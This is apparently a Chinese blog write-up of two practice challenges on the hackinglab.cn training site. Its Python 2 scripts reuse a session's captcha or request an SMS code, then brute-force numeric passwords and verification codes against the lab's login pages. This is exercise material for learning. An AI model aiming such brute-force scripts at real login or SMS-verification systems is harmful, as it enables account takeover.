闲着无事跟着某同学在hackinglab.cn上做两道脚本题练手 就是模拟POST发包而已
4-大致上是每次访问index.php相对应一个验证码,只要不重新访问这个页面,用同一个验证码即可。于是代码模拟访问这个页面,获取cookie,再暴力密码post
11-思路相近,查看源码推测是post到vcode.php对应一个验证码,所以暴力之前post到这个php一次
PS:需要暴力两个电话号码
#!/bin/env python import urllib, urllib2, cookielib cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) response = urllib2.urlopen('http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/index.php') print response.read() username="admin" pwd=1 vcode="" submit="submit" vcode = raw_input() data = {'username': username, 'pwd': pwd, 'vcode': vcode, 'submit': submit, } for i in range(10000, 1000, -1): data['pwd'] = i f = urllib2.urlopen( url = 'http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php', data = urllib.urlencode(data), ) if 'error' not in f.read(): print 'answer is %d' % i break
#!/bin/env python import urllib, urllib2, cookielib cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) response = urllib2.urlopen('http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/#') print response.read() response = urllib2.urlopen( url = 'http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/vcode.php', data = urllib.urlencode({'getcode':1, 'mobi':13399999999}) ) print response.read() username="13399999999" vcode="" submit="submit" data = {'username': username, 'vcode': vcode, 'Login': submit, } for i in range(100, 1000): data['vcode'] = i f = urllib2.urlopen( url = 'http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/login.php', data = urllib.urlencode(data), ) print f.read() """ if 'error' not in f.read(): print 'answer is %d' % i break """
